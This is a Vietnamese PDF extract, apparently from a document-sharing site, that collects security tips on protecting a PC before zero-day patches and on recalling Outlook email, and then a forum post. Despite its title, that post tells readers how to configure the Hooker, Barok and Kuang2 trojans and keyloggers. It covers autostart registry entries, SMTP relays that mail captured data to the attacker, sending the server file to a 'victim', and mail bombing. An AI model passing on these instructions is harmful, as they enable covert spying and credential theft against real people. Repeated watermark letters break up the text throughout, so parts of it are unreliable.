Tải bản đầy đủ (.pdf) (5 trang)

Giáo trình hướng dẫn thực hiện bảo mật cho hệ thống để tránh các nguy hiểm từ internet phần 9 pdf

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (584.07 KB, 5 trang )

trong danh sách Safe Sender, cũng như vô tình có những thuộc tính nào đó tương đồng với đặc điểm
nhận dạng thư rác của Junk Email.

Song Đặng

Bảo vệ PC khi chưa có bản vá


Thực hiện: Nguyễn Lê

Kẽ hở ngày zero (zero-day) tạo nên tình trạng dễ bị tấn công của phần mềm mà nhà sản xuất chưa kịp
vá lỗi. Tuy nhiên vẫn có cách giữ an toàn cho máy tính của bạn trong thời gian "trống" này.

1. Từ bỏ Internet Explorer 6. Một trong những hành động tốt nhất mà bạn có thể làm để cải thiện độ
an toàn khi lướt web là tống khứ trình duyệt đầy lỗi tai tiếng của Microsoft. Dĩ nhiên, không có
chương trình nào tuyệt đối an toàn; nhưng IE 6 dễ bị tấn công hoặc vì bản thân nó vốn "ốm yếu", hoặc
vì có số lượng người dùng đông đảo nên trở thành mục tiêu hấp dẫn. Hãy nâng cấp lên IE 7 hay dùng
trình duyệt khác thay thế như Firefox hay
Opera.
2. Thử các chương trình khác thay thế cho
những mục tiêu thường bị tấn công zero-day.
Chẳng hạn dùng chương trình Foxit thay cho
Adobe Reader và OpenOffice thay cho MS
Office.
3. Thiết lập chế độ cập nhật tự động cho
Windows và các chương trình khác khi có
thể. Các lỗi nghiêm trọng thường vẫn là mục
tiêu tấn công ngay cả sau khi đã có bản vá, do
tin tặc biết nhiều người không thèm vá lỗi. Để kiểm tra và thay đổi thiết lập Windows Update, nhấn
Automatic Updates trong Control Panel. Để hệ thống luôn cập nhật, bạn nên chọn Download updates
for me, but let me choose when to install them.



Các chương trình khác cũng có thể thiết lập cập nhật tự động. Ví dụ, trong Firefox, vào
Tools.Options.Advanced, và chọn mục Update (nên chọn mặc định Ask me what I want to do). Với
Adobe Reader, bạn cần kiểm tra thủ công các bản cập nhật trong menu Help, rồi nhấn nút Preferences.

4. Sử dụng chương trình chống virus hay bảo mật có khả năng phân tích thông minh hay theo hành vi
để bổ trợ cho phần mềm chống virus dựa trên thông tin nhận dạng truyền thống.



DropMyRights cung cấp giải pháp ngăn chặn miễn phí.
Click to buy NOW!
P
D
F
-
X
C
h
a
n
g
e

V
i
e
w
e
r

w
w
w
.
d
o
c
u
-
t
r
a
c
k
.
c
o
m
Click to buy NOW!
P
D
F
-
X
C
h
a
n
g
e


V
i
e
w
e
r
w
w
w
.
d
o
c
u
-
t
r
a
c
k
.
c
o
m
5. Sử dụng firewall của Windows XP hay của
một hãng nào đó. Firewall giúp ngăn chặn các
đoạn mã phá hoại (sâu - worm) có thể quét
máy tính của bạn để tìm các lỗ hổng chưa
được vá và đột nhập. Để kiểm tra xem

firewall của Windows XP có được kích hoạt
hay chưa, vào Control Panel, mở Security
Center và nhấn liên kết Windows Firewall.
Hầu hết router băng rộng đều có chức năng
firewall.

6. Sử dụng chương trình ngăn chặn như
DropMyRights để bổ trợ phần mềm chống
virus hay bảo mật. Hiện có nhiều công cụ tiện
ích, cả miễn phí và có phí, thay đổi cách thức
vận hành các chương trình dễ bị tấn công để
giới hạn vùng ảnh hưởng nếu xảy ra tấn công zero-day.

7. Cập nhật thông tin. Trang chuyên đề "Bảo mật" của Thế Giới Vi Tính Online cung cấp tin tức mới
nhất về các mối đe dọa bảo mật, các hướng dẫn an toàn và các bài nhận xét về sản phẩm bảo mật.
Ngoài ra còn có các nguồn thông tin tốt khác như website eEye Zero-Day Tracker (research.eeye.com)
và blog Security Fix (

Nguyễn Lê
PC World Mỹ 04/2007

Thu hồi Email đã gởi trong MS Outlook

Có lúc nào đó bạn đã gởi đi một Email nhưng bất chợt "thôi chết rồi gởi lộn
địa chỉ rồi" và bạn muốn lấy lại email đó. Nếu bạn sử dụng Microsoft
Outlook hãy làm theo cách này :

1. Vào Sent Items
2. Chọn cái mail mà bạn đã gởi nhầm (click vào nó)
3. Trong cái cửa sổ của mail đó bạn vào Action trên thanh Menu và chọn

tiếp Recall This Message
4. Bạn sẽ có hai lựa chọn hãy chọn Delete unread copies of this message

(c)

Sử dụng và diệt các loại trojan nè

Lang thang trên mạng mới tìm đc mấy cái nên box lên cho anh em
xem nè:

Các bản vá không dập tắt các cuộc tấn công zero-day nhưng
các bản cập nhật cần cho việc bảo vệ PC.


Click to buy NOW!
P
D
F
-
X
C
h
a
n
g
e

V
i
e

w
e
r
w
w
w
.
d
o
c
u
-
t
r
a
c
k
.
c
o
m
Click to buy NOW!
P
D
F
-
X
C
h
a

n
g
e

V
i
e
w
e
r
w
w
w
.
d
o
c
u
-
t
r
a
c
k
.
c
o
m



1.Đầu tiên là con Trojan Hooker
Sau khi bạn tải con này về ,các bạn chạy tập tin Hkconf.ini các bạn
đặt thuộc tính cho
file này như sau
Số 1 là đặt thuộc tính enable cho tính chất đó
Số 0 là đặt thụôc tính disable cho tính chất đó

kill = 1 ;kill itself?
Ví dụ nếu bạn chọn kill=1 thì nó sẽ tự kill nó,còn nếu chọn 0 thì nó
sẽ không tự kill nó

Nhưng mấy cái dó không quan trọng cái quan trọng là phần host đây
là cai server
mà thông qua đó con Trojan đó sẻ gửi thư về cho ta

sendmail host
host=mx4.mail.yahoo.com


Phần host= bạn có thể cho nó bằng các Host tôi đưa ra đây (không
biết có cái nào không còn họat động không nữa , vì mấy cái này họat
động bất thường lằm ,lâu rồi tôi chưa thử nên không biêt ,nếu anh
em ai biết cái nào còn họat động tốt thì Post lên cho anh em xài)

SMTP đây :
mx2.mail.yahoo.com
hoac mx4.mail.yahoo.com
hoac mta45.mail.yahoo.com
hoac hcm-mail-prepaid.vnn.vn==> tot day
hoac mta-v13.level3.mail.yahoo.com

hoac isp-mta.fpt.vn
hoac mta469.mail.yahoo.com ===>rat tot

Nhân dây tôi cũng giải thích cho các bạn rõ Smtp (Simple Mail
Transfer Protocol ) là gì :đây là một giao thức đưa trên TCP/IP được
sử dụng để upload thư của người dùng lên mail Server,nói đơn giàn
Click to buy NOW!
P
D
F
-
X
C
h
a
n
g
e

V
i
e
w
e
r
w
w
w
.
d

o
c
u
-
t
r
a
c
k
.
c
o
m
Click to buy NOW!
P
D
F
-
X
C
h
a
n
g
e

V
i
e
w

e
r
w
w
w
.
d
o
c
u
-
t
r
a
c
k
.
c
o
m
hơn smtp
giống như là anh đưa thư vậy ,có đia chỉ rồi nhưng không có anh
đưa thư ,thì thư cũng không được chuyển đến địa chỉ đó được ,smtp
cũng vậy phải có nó thì các thông tin mới được gủi về hộp mail của
mình.

Đay cũng là cách để Bomb mail luôn đó ( Post=25)
Và phần quan trọng không kém là phần điền địa chỉ thư để mà con
Trojan còn gũi thư về cho ta nữa chứ


mailto - your email
mailto=bạn diền dịa chỉ của bạn vào chỗ này
Thư của bạn được gủi về hộp thư của bạn với chủ đề

subject of message
subj=đây là chủ dề mà bạn sẽ nhận dược khi con Trojan gửi thư về
cho bạn

name of exec
exename=hsys.exe ===> dây là tập tin mà con Trojan sẽ chạy ngay
trong máy của Victim
Bạn cũng có thể dổi tên tập tin này

reg_path=
====>đây là hướng dẫn dễ con trojan ghi tên nó vào Registry để
mỗi lần khởi động máy thì nó tự động chạy ===>bạn cũng có thể
thay đỗi hướng dẫn

À Quên một cái cũng rất là quan trọng ,là nếu ở dòng cuối cũng của
file Hkconf.ini nếu ở trên là dòng
S5 thì bạn thêm vào dòng cuối cùng là S6=logon còn nếu là dòng
trên là S12 th2i bạn thêm vào S13=logon

Xong bạn save file Hkconf.ini này lại rồi chạy file config.bat ,xong bạn
gửi file hooker.exe
cho victim đi là xong
Nói chung phần này không khó các bạn có thể tự đọc và làm lấy ,dể
tôi chuyển sang các con khác
Click to buy NOW!
P

D
F
-
X
C
h
a
n
g
e

V
i
e
w
e
r
w
w
w
.
d
o
c
u
-
t
r
a
c

k
.
c
o
m
Click to buy NOW!
P
D
F
-
X
C
h
a
n
g
e

V
i
e
w
e
r
w
w
w
.
d
o

c
u
-
t
r
a
c
k
.
c
o
m

2.Tôi xin nói về con Barok
Con này sủ dụng rất là dễ
Bạn download về xong rồi chạy file setup.exe
Sau đó bạn nhập vào nut Open Server mở tập tin server.exe
Rất đơn giản
Trong phần file name bạn dặt tẹn vidu là Barok thì sau này nó sẽ tự
ghi vào máy
victim với cái tên là Barok.exe
Phần out going mail server bạn diền phần Smtp như tôi dã nói ở trên
Phần destination diền emal của bạn vào
Xong bạn save lại rồi
gủi file server.exe cho victim thế là xong


3.Sau đây là tôi chỉ cho các bạn xài con Kuang2keyloggeras

Cách sử dụng cũng giống như con Barok khi download về rồi đầu tiên

bạn chạy
file K2as_sự.exe hiện ra một giao diện nhập vào nút Open chọn file
K2logas và mở
file nảy ra
bạn điện những thu cần thiết vào(smtp,email như tôi đã nói ở trên)
phần source address bạn điện địa chỉ nào cũng được
Con phần bên phải là các thiết lập tuy bạn chọn để con này sẽ gửi về
cho bạn những
gì bạn yêu cầu như có lưu phím mở rộng hay là để thời gian máy
ngày con trojan gửi thư
về cho bạn
Nói chung bạn đánh dấu chọn hết cho chắc ăn
xong bạn save lại và gửi file K2logas cho victim là xong

4.Con Kuang2 cũng sử dụng giống như con Kuang2keyloggeras mà
thôi


5.Bây giờ tới nơi đến con Keylog:===> à mà con này hình như bác
người_dân_đường_hanoi đã nói nhiều
Click to buy NOW!
P
D
F
-
X
C
h
a
n

g
e

V
i
e
w
e
r
w
w
w
.
d
o
c
u
-
t
r
a
c
k
.
c
o
m
Click to buy NOW!
P
D

F
-
X
C
h
a
n
g
e

V
i
e
w
e
r
w
w
w
.
d
o
c
u
-
t
r
a
c
k

.
c
o
m

×